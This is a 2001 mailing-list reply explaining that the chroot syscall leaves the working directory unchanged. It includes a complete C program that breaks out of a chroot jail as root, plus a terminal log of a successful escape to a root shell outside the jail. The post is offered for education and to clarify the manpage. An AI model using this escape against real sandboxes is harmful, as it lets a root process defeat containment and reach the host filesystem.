Re: chroot

[Alan Shutko]

Christian Jaeger <[EMAIL PROTECTED]> writes:

>> Yep, that's alread in the old manpage. For this reason it's very
>> important to chdir inside the chrooted tree before doing the chroot
>> call. (The chroot binary does this, as hopefully do all other programs
>> using chroot for security purposes). If you do that, the risk isn't
>> there anymore.
>
> Hmmmm, at first glance it even looks like a mistake in the chroot(2)
> manpage (from woody - in potato there's only the first of the two above
> sentences): `mkdir foo; chroot foo; cd ..' does *not* escape foo, at
> least not with the chroot command in potato (kernel 2.4.7).

It was really talking about syscalls, not commands.  While the chroot
command (chroot(3)) changes the working dir to the chrooted tree, the
syscall does not.  

Here's a sample program.  Build it with make -k breakchroot
CFLAGS="-static -g -Wall" (yes, there's no makefile... it's a
feature!) and put it inside your chrooted tree.  Then chroot chroot
(assuming bash is in the tree for this test), and ./breakchroot as root.
You'll get a shell located _outside_ the chroot.

If you have an attacker with a root process in a chroot jail, and they
can execute syscalls (which exploits do all the time) they won't need
a program like this sitting in the jail... this is just for
educational purposes.

Included is a script showing the breakout.  Please ignore any blatant
coding errors in this... I just whipped it up quickly and there are
probably better ways to do all of this.

-- 
Alan Shutko <[EMAIL PROTECTED]> - In a variety of flavors!
Bones: "The man's DEAD, Jim!"

#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(void)
{
    int i;
    
    mkdir("breakout", 0777);
    if (chroot("breakout") < 0)
        perror("chroot failed");

    for (i = 0; i < 100; i++)
        if (chdir("..") < 0)
            perror("chdir failed");
    if (chroot(".") < 0)
        perror("chroot2 failed");

    execl("/bin/bash", "/bin/bash", (char *)NULL);
    perror("system failed");
    
    exit(0);
}

Script started on Sun Oct  7 17:54:04 2001
wesley:/home/ats# ls

Desktop   RPG             chroot                   munster-stuff

Letters   Todo            core.12219               myth2-gg

Library   Work            glibc-2.2.4              nobackup

Mail      bin             glibc_2.2.4-3.diff.gz    preview

News      breakchroot     glibc_2.2.4-3.dsc        public_html

Photos    breakchroot.c   glibc_2.2.4.orig.tar.gz  tmp

Projects  breakchroot.c~  lang                     typescript

wesley:/home/ats# ls chroot

bin  breakchroot  breakout  lib

wesley:/home/ats# chroot chroot

wesley:/# ls

bash: ls: command not found

wesley:/# echo *

bin breakchroot breakout lib

wesley:/# ./breakchroot 

wesley:/# ls

bin    dev       dos     home    kiki        misc  proc  simon  var

boot   devlinux  etc     hubert  lib         mnt   root  tmp    vmlinuz

cdrom  devsco    floppy  initrd  lost+found  opt   sbin  usr    vmlinuz.old

wesley:/# echo      exit

wesley:/# echo *

bin breakchroot breakout lib

wesley:/# e exit

wesley:/home/ats# ls /

bin    dev       dos     home    kiki        misc  proc  simon  var

boot   devlinux  etc     hubert  lib         mnt   root  tmp    vmlinuz

cdrom  devsco    floppy  initrd  lost+found  opt   sbin  usr    vmlinuz.old

wesley:/home/ats# 
Script done on Sun Oct  7 17:54:30 2001